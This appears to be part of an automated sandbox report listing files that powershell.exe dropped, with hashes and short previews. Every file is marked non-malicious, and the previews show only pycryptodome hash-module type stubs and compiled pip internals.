                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):588
                                                                                                                                                                                                                      Entropy (8bit):4.505456264915036
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYB3vIY3vJ1ApWaNaFeLsQwRh72CX5BfWaNaFeLsXJaNi4j:1REcT3rA1Npuh717NpsENiS
                                                                                                                                                                                                                      MD5:42C9FEC1BF1C0D408407E53932837C93
                                                                                                                                                                                                                      SHA1:12F0171C79E934BF9202A864E6D87404EBDB1BDE
                                                                                                                                                                                                                      SHA-256:4C18BD17FAE1D883D8710836B105100A6732AEF4639967F09FD1B7BD636E21B0
                                                                                                                                                                                                                      SHA-512:9FC2C7FBFE0D15D327D6155DDB6613C1BDFC966E7BD2EC0D50CAE0DE981F5A1752B4A303EDFD9D87D68C7A0B2026E082B7F3DD3B40F8426B5CF9E0CF48A64723
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class K12_XOF(object):.. def __init__(self,.. data: Optional[Buffer] = ...,.. custom: Optional[bytes] = ...) -> None: ..... def update(self, data: Buffer) -> K12_XOF: ..... def read(self, length: int) -> bytes: ..... def new(self,.. data: Optional[Buffer] = ...,.. custom: Optional[bytes] = ...) -> None: .......def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> K12_XOF: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6289
                                                                                                                                                                                                                      Entropy (8bit):4.7416115082716255
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:MwDqrYJALrYJHdt3EHGuIWigNIa9LSVHSvtNz8iz1I7NHZDE3aOMz/fXqNagW6:9qrskrs9t3q/Ii9L8i4NmKpfLI
                                                                                                                                                                                                                      MD5:660EC20D516F4302FFA4B15EE16306F9
                                                                                                                                                                                                                      SHA1:AEF72534F10CC43C00BCB01EBDF41D81EF45272C
                                                                                                                                                                                                                      SHA-256:9601D8D74A4028C92FB70CFCE74BA0D60452626FDEE745449CA0422F673FDDC5
                                                                                                                                                                                                                      SHA-512:5C32AF4E0AB5C49332267602A719BB27C8609CE01671993E4BC8C430849A323CD8367DED39E0FBC093637CF78925F37A570FE87D33D63E8721E09C07D7917960
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2014, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):6566
                                                                                                                                                                                                                      Entropy (8bit):4.890890389511337
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:Nqrskrs9t3q/Io14i44sZ3x6Bki1DC/imkL:krskrs9VqMVYDt
                                                                                                                                                                                                                      MD5:F5CDFCD5C259D62291113B07DB52B402
                                                                                                                                                                                                                      SHA1:300243D2344D0D8C251129E07B662D358A4B5493
                                                                                                                                                                                                                      SHA-256:349CAB0602EA40BCFF277FFB4BDC28349EB5BA22ABACAA2787C065BE5E632FDB
                                                                                                                                                                                                                      SHA-512:45148EF6266F348F84BB3CE9F81FEEFC64775503166FF0795BA31E42060ED6E680A062084ECDAD4B2D2E5E0624861416207BC50608A703F15B9EAB3515B9BB88
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):513
                                                                                                                                                                                                                      Entropy (8bit):4.65254840298011
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYB3vIY3AJ1ApWaN5hFeLBaFeLsQwWh72CX5AJaNi4Y:1REcT34A1N56Vp7h71GENiL
                                                                                                                                                                                                                      MD5:650178B2B4C1BBE35CB633D193929B0B
                                                                                                                                                                                                                      SHA1:08A93F8C458ED63BB136821EF52ADF04B70C02A8
                                                                                                                                                                                                                      SHA-256:996DE23B6A41D7158B3C0DD8B3DE5DE532F6953706640866CBE19243A882F3A3
                                                                                                                                                                                                                      SHA-512:628B50274BDFA31ABCA9D06A433C493C0953C3F8BBB4949BC83EBF370F383F182D80DAF12850388F0B0EB0D989A6CA3E34329CFF9FB8051F4E649DA6F47B8C3E
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Optional....Buffer = Union[bytes, bytearray, memoryview]....class cSHAKE_XOF(object):.. def __init__(self,.. data: Optional[Buffer] = ...,.. function: Optional[bytes] = ...,.. custom: Optional[bytes] = ...) -> None: ..... def update(self, data: Buffer) -> cSHAKE_XOF: ..... def read(self, length: int) -> bytes: .......def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> cSHAKE_XOF: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2266
                                                                                                                                                                                                                      Entropy (8bit):5.322369071820482
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:MMWOqrYJALrYJHdG43tDs3EsIG13NcuIH297ywQWVfxMxC4GIAacQWVa:MMDqrYJALrYJHdt3EHGuIW97mWVJMQEL
                                                                                                                                                                                                                      MD5:AD58F2B4B180AE90780FEFD35BF17EA7
                                                                                                                                                                                                                      SHA1:E74E96344CE8A3E5BC25BBD2DC670D8F23ED45D1
                                                                                                                                                                                                                      SHA-256:D7F74253988AD96510F53CEBD756E94E4B1B45CC339B325349EE25D5B3B57458
                                                                                                                                                                                                                      SHA-512:CD78F8B20EACB07A07D3FE98482B4D93E7750FA32AD5C4AEB3DC07C8CA4444690CD96E4FE7EA6220DBF560F3C9E778F97630DCED6D7853605B4F660728945313
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2021, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):243
                                                                                                                                                                                                                      Entropy (8bit):5.025929082655644
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:1REYBXy1kwQORyoczrIY3MTDyJaNyRD4JRQ:1REYBCk5FHvIY3YyJaNi4Y
                                                                                                                                                                                                                      MD5:B419DCDBEE755F0B775F7CA84AC2C4F2
                                                                                                                                                                                                                      SHA1:0AFA02C4AC01B3CBD27E24105AED4EB9F6553889
                                                                                                                                                                                                                      SHA-256:5DA57A092D8D896CE5D295D7DD69D56B6EF1E4AA38294346F7EA0A6FDC56AEF2
                                                                                                                                                                                                                      SHA-512:E70A94DA054A7DEB6ECB6F877BE8D798DEE8614864759364F4AF3BA7F1A67218C699F1BDCEEB41693A28178266DA10E3370F8704A7EAB79F702EE73184EC06C7
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Optional....from Cryptodome.Hash.cSHAKE128 import cSHAKE_XOF....Buffer = Union[bytes, bytearray, memoryview]....def new(data: Optional[Buffer] = ...,.. custom: Optional[Buffer] = ...) -> cSHAKE_XOF: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7736
                                                                                                                                                                                                                      Entropy (8bit):4.641967039358604
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:M7DqrYJALrYJHdt3EHGuIWigNIPjg9Ss8J8lixIVmkO/YZ3RUaIDrFX2dlPcQ:4qrskrs9t3q/Izgnli7kO/YBiMUQ
                                                                                                                                                                                                                      MD5:481F2C2773C846EA9AD8E66F7FD472B9
                                                                                                                                                                                                                      SHA1:EF9C61B295D0FFB6D0D20F8C4F768D6595EDCC73
                                                                                                                                                                                                                      SHA-256:DE04F2D83CF1A98B3F895904F22D3C4265AD9C3700FF18FF535072B5F5A2015B
                                                                                                                                                                                                                      SHA-512:50A0D3F436B406305FE6B75BEA732B6EA6486ACA17285A4D43D6C80651C313F8C96573C1D55F5E7A699867C5C2E81C7FCF52F051E208FFF7AC8EED84ED1BC05A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:# ===================================================================..#..# Copyright (c) 2015, Legrandin <helderijs@gmail.com>..# All rights reserved...#..# Redistribution and use in source and binary forms, with or without..# modification, are permitted provided that the following conditions..# are met:..#..# 1. Redistributions of source code must retain the above copyright..# notice, this list of conditions and the following disclaimer...# 2. Redistributions in binary form must reproduce the above copyright..# notice, this list of conditions and the following disclaimer in..# the documentation and/or other materials provided with the..# distribution...#..# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS..# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT..# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS..# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE..# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FO
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:Python script, ASCII text executable, with CRLF line terminators
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):764
                                                                                                                                                                                                                      Entropy (8bit):4.362163899247177
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:12:1REYBhvIY3PHpRyD1Ap1uw+z65JX3LBq3v37lz04LBK3P3blzO:1REYT3v/IALWz6LLBkPhz04LBEvBzO
                                                                                                                                                                                                                      MD5:0A2310BA7677F27E22A421132A86D382
                                                                                                                                                                                                                      SHA1:A976C8749DEE4E295DD8C808E2A7A47922E86BB4
                                                                                                                                                                                                                      SHA-256:3A1DB3E7321EFB30C4AAF0FAD5728728C7AADCEBBBE91E4272940DB1F9A677F9
                                                                                                                                                                                                                      SHA-512:6526BCDFF7B41EB7E94F83A2E1A770D6216E4C575410E8689C7119F6A53170CAA5B2F8AED037EB5AB40C7CA361C2E7208BF3F19C69D8E619150A1C68779FE22C
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:from typing import Union, Any....Buffer = Union[bytes, bytearray, memoryview]....class Keccak_Hash(object):.. digest_size: int.. def __init__(self,.. data: Buffer,.. digest_bytes: int,.. update_after_digest: bool) -> None: ..... def update(self, data: Buffer) -> Keccak_Hash: ..... def digest(self) -> bytes: ..... def hexdigest(self) -> str: ..... def new(self,.. data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .......def new(data: Buffer = ...,.. digest_bytes: int = ...,.. digest_bits: int = ...,.. update_after_digest: bool = ...) -> Keccak_Hash: .....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):271
                                                                                                                                                                                                                      Entropy (8bit):5.095236469830096
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:Lr0aCCVmXQtG5YiMh/Z6B0Wlt495/n23d6oAreKAsShMR6IaYleHXlll:MaCCMXVYic6BvP6/2ImblMRjaYkH1ll
                                                                                                                                                                                                                      MD5:AC272126EEA37D5999C353B555DECA41
                                                                                                                                                                                                                      SHA1:F3C05FEA053739F3AB665650BBEB74EF67277419
                                                                                                                                                                                                                      SHA-256:5C5DDBDFFB23596EBF3F518F658EDBF8B2C262151CCBE8D201E7B5DAC8BD29BF
                                                                                                                                                                                                                      SHA-512:52B3FF6DCE37544647361E35E95FA07AA3218003BB02B052058F52767122DA2780B964802FB945F9194F223D0FD676B3CF84EAD15D6279DB1A33CC402197B022
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e2...............................d.Z.y.).z+Contains purely network-related utilities..N)...__doc__........rC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/network/__init__.py..<module>r........s..............r....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):18791
                                                                                                                                                                                                                      Entropy (8bit):5.508828887551784
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:SA5OzATqK1yo9Uhmo3ZcmrVDW34lNfouw7CIFv+hF6zrN:SA5OCUcgnfO+hFMrN
                                                                                                                                                                                                                      MD5:BFEEBEADB31C4C8F16BDC8C04BC9CD35
                                                                                                                                                                                                                      SHA1:89B99451E1EE97645F574324355B3ED944C7EC95
                                                                                                                                                                                                                      SHA-256:F5CC9160C95B3781A67F440F868D74163C35A17342337422751745EF2E9DD6BC
                                                                                                                                                                                                                      SHA-512:B40A3CF0BE75AFABD793BB11DC07CD34AD4FE633CF63A9D36F3EE6D6399FDF93811409C4FD086A7989BF0CD7F48B6BB186894464A3069041288ADB6330405276
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e.I..............................U.d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z ..d.d.l!m"Z"m#Z#..d.d.l!m$Z%..d.d.l&m'Z'm(Z(..d.d.l)m*Z*..d.d.l+m,Z,..d.d.l-m.Z...d.d.l/m0Z0..d.d.l1m2Z2..d.d.l3m4Z4..d.d.l5m6Z6..d.d.l7m8Z8..d.d.l9m:Z:..d.d.l;m<Z<..d.d.l=m>Z>m?Z?..d.d.l@mAZA..e.r.d.d.lBmCZC..d.d.lDmEZE....e.j...................eG........ZHe.eIeIe.e.eJeIf.........f.....ZK..e.j...................d.e.............g.d...ZMe.eK....eNd.<...d.ZOd.ePf.d...ZQd.eIf.d...ZR..G.d...d e#........ZS..G.d!..d"........ZT..G.d#..d$eTe%........Z$..G.d%..d&eTe ........Z...G.d'..d(e$........ZU..G.d)..d*e.........ZV..G.d+..d,e.j...........................ZXy.)-zhPipSession and supporting code, containing all pip-specific.network request configuration and behavior.......N)...TYPE_CHECKING..Any..Dict..Generator..List..Mapping..Optional..Sequence..Tuple..Union)...reques
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2270
                                                                                                                                                                                                                      Entropy (8bit):5.565464819838446
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:368uaLawawkR5fTDUFH9t2ev1U4a4IfbMkQT7g4qJYQ0n:3MwbkBQFHz64gdQg4qYQ0n
                                                                                                                                                                                                                      MD5:E55DA55B9B3088392A18A0A1702AB790
                                                                                                                                                                                                                      SHA1:6657AEB37C6567D2E6C94D7A37C3C069A32574DF
                                                                                                                                                                                                                      SHA-256:DDC81985B99D1B157A6657CA668891382653B2352BADB5925536B336222D872C
                                                                                                                                                                                                                      SHA-512:58EA1633E8CFC0C140BC2A9E8C58A7FE5480D6D1E6513EDF3F94FE175129A0655E5DDE65C6F883E07E2735B916DA9B8D6BFD179D313EBEC3A57336D72CE704F3
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e...............................U.d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.i.Z.e.e.e.f.....e.d.<...d.e.d.d.f.d...Z.e.f.d.e.d.e.d.e.e.d.d.f.....f.d...Z.y.)......)...Dict..Generator)...CONTENT_CHUNK_SIZE..Response)...NetworkConnectionErrorz.Accept-Encoding..identity..HEADERS..resp..returnNc...........................d.}.t.........|.j...................t.................r...|.j...................j...................d.........}.n.|.j...................}.d.|.j...................c.x.k...r.d.k...r"n...n.|.j.....................d.|...d.|.j.......................}.n6d.|.j...................c.x.k...r.d.k...r!n...n.|.j.....................d.|...d.|.j.......................}.|.r.t.........|.|.............y.#.t.........$.r...|.j...................j...................d.........}.Y...w.x.Y.w.).N..z.utf-8z.iso-8859-1i....i....z. Client Error: z. for url: iX...z. Server Error: )...response)...isinstance..reason..bytes..decode..UnicodeDecodeError..status_code..urlr....).r......http_er
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):2961
                                                                                                                                                                                                                      Entropy (8bit):5.445847074251416
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:48:wSB++JWLcdP++/1eqoZ4f2/BX30SljugoDmsJ5c60687i6llPLmR:Q+JWLcc+dsHjvs3c6z0L2
                                                                                                                                                                                                                      MD5:80A9EC091F05799A916A130DDBC4D3CA
                                                                                                                                                                                                                      SHA1:7557F636CFF9995E4FD3E36245CEA97B00EF7A1D
                                                                                                                                                                                                                      SHA-256:63625C68B9AC265442BD79D14B1917DA850607C886F38C548048ECCF046DAA61
                                                                                                                                                                                                                      SHA-512:670562DD67656C5C8DC9DC1F020A098CF3F8DE70C3BC5AB4659D7B6EE67BC90BC2E3980ED7666F705DFD700997FEEF7075DB89C1EA8708F81879A921D84B7C08
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e................................d.Z.d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...e.r.d.d.l.m.Z.m.Z...d.d.l.m.Z.....e.j&..................e.........Z...G.d...d.e.j,..................j...........................Z.y.).z#xmlrpclib.Transport implementation......N)...TYPE_CHECKING..Tuple)...NetworkConnectionError)...PipSession)...raise_for_status)..._HostType.._Marshallable)...SizedBufferc.....................^.......e.Z.d.Z.d.Z...d.d.e.d.e.d.e.d.d.f...f.d...Z...d.d.d.d.e.d.d.d.e.d.e.d.....f.d...Z...x.Z.S.)...PipXmlrpcTransportzRProvide a `xmlrpclib.Transport` implementation via a `PipSession`. object.. ..index_url..session..use_datetime..returnNc............................t...........|.....|...........t.........j...................j...................|.........}.|.j...................|._.........|.|._.........y.).N)...super..__init__..urllib..parse..urlparse..scheme.._scheme.._session)...selfr....r....r......index_parts..__class__s....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):214
                                                                                                                                                                                                                      Entropy (8bit):4.765767895983964
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6:L2/VneB95/n23d6oAreKAqAIZ6Iaatgem/l:i/Vel/2ImbsZjaatHmt
                                                                                                                                                                                                                      MD5:3A9E4E0100E45F01891B5C02311F9754
                                                                                                                                                                                                                      SHA1:18A41C01546511991344CCF959F62D567981D4F7
                                                                                                                                                                                                                      SHA-256:6FA7E25B8E5BBCBF33A5A0D6350689F4223A35E6656B8983BFC18DAC65DA26A2
                                                                                                                                                                                                                      SHA-512:09A21CB7AEBDD86DD266557386841F91C0E45CA36D03E4873FF87F76DC5438D0924C5416211E3D5A1C94C9D4704EFF7CB31D7C21D4541291FDD46CCEA77B7500
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e................................y.).N..r..........uC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/__init__.py..<module>r........s.........r....
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):7596
                                                                                                                                                                                                                      Entropy (8bit):5.618716612684369
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:4t3UWTJ1ljY5AxTXr1ysXCvBpvscGpyvv01aiY0//xB8a0x6qAPSu0Zbh:4tEWF1lEE0pkcGpyvv0T7/n8aPqu0ZF
                                                                                                                                                                                                                      MD5:25EA89F2828153EE79CE7D4A1750AD92
                                                                                                                                                                                                                      SHA1:7C94BBFE17478DEA3EB00D64C5B98E64CBBB68F9
                                                                                                                                                                                                                      SHA-256:C3B89F72D868FCFA3F4FBABEAA78356DD2D26762F639878904C57BC0FF542B21
                                                                                                                                                                                                                      SHA-512:3DBF99E8D6918213DA3CB9EEF8EE4034AC8ECAC47D8CD0267676A004A2A35958110D137BEDB431DC0FAD6E4AB32BA125072D1CDA960C97A7990EE4907BC6C69B
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.e................................d.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j:..................e.........Z...G.d...d.e.........Z e.e.e f.....Z!e.e.e.f.....Z"e.e.e.e.f.....Z#e.e.e.e"....f.....Z$e.e.e.e#....f.....Z%e.e$e%f.....Z&e.e!e&f.....Z'd.e.e!e(f.....f.d...Z)..d.d.e!d.e.e.e*g.e(f.........d.e&f.d...Z+d.e.e.....d.e'f.d...Z,d.e.e.....d.e!d.e.e.....f.d...Z-d.e.e.....d.e!d.e.e.....f.d...Z.d.e!d.d.f.d...Z/y.).z'Validation of dependencies of packages......N)...Callable..Dict..List..NamedTuple..Optional..Set..Tuple)...Requirement)...LegacySpecifier)...NormalizedName..canonicalize_name)...LegacyVersion)..)make_distribution_for_install_requirement)...get_default_environment)...DistributionVersion)...InstallRequirement)...deprecatedc.....................(.....e.Z.d.Z.U.e.e.d.<...e.e.....e.d.<...y.)...PackageDetails..version..dependenciesN)...__name__..__module__
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):10131
                                                                                                                                                                                                                      Entropy (8bit):5.436114230205905
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:YhVFw9boYtQ3JHhpQ7EBNgtvWBUrHZKlobtlhPpRQwKEKF:YhVuFQJBpQ78CQBUrHV7hPp5zKF
                                                                                                                                                                                                                      MD5:DF3888072485E5004445256050E9C80A
                                                                                                                                                                                                                      SHA1:D588D4DABE19E8404A29C4D13A6ED0DCED3DE746
                                                                                                                                                                                                                      SHA-256:687A6CB1F9C15EBD883C709FB1B5620641E4FDA02C8A13AB109BABD15F76166D
                                                                                                                                                                                                                      SHA-512:A072B4C6CC096A25068272DD874313B207DDCCB7B28F1A22BA46D02770387C7005BA18D3395936D495D09628D15296A6FC2FCBB6D8202A605EBE70C31BBE7AE0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Preview:.........j.eX&........................t.....d.d.l.Z.d.d.l.Z.d.d.l.Z.d.d.l.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z.m.Z...d.d.l.m.Z...d.d.l.m.Z.....e.j:..................e.........Z...G.d...d.e.........Z ..............d.d.e.e.e!........d.e"d.e"d.e.e.e!........d.e"d.e"d.e.e!....d.e.e!d.d.f.....f.d...Z#d.e.d.e!f.d...Z$d.e.d.e f.d...Z%..G.d...d.........Z&y.)......N)...Container..Dict..Generator..Iterable..List..NamedTuple..Optional..Set)...canonicalize_name)...Version)...BadCommand..InstallationError)...BaseDistribution..get_environment)...install_req_from_editable..install_req_from_line)...COMMENT_RE)..%direct_url_as_pep440_direct_referencec.....................(.....e.Z.d.Z.U.e.e.d.<...e.e.....e.d.<...y.)..._EditableInfo..requirement..commentsN)...__name__..__module__..__qualname__..str..__annotations__r............sC:\Users\Administrator\AppData\Local\Programs\Python\Python312\Lib\site-packages\pip/_internal/operations/freeze.py
                                                                                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):25720
                                                                                                                                                                                                                      Entropy (8bit):5.256060956173821
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:384:zO2wKTooLdImMUGJEe5jRvrPXwXK5wfK44L7JTKRp6yLa+4JgL5WVUDuYCOY9a:ZTooJHcEkRvrXSSR3L7JTKRw7/gxD4Oj
                                                                                                                                                                                                                      MD5:9847FEB1312EDED8EA41C4B44961F11A
                                                                                                                                                                                                                      SHA1:832F20189BA38C733FFFC48E424E60C72CA6FBEE
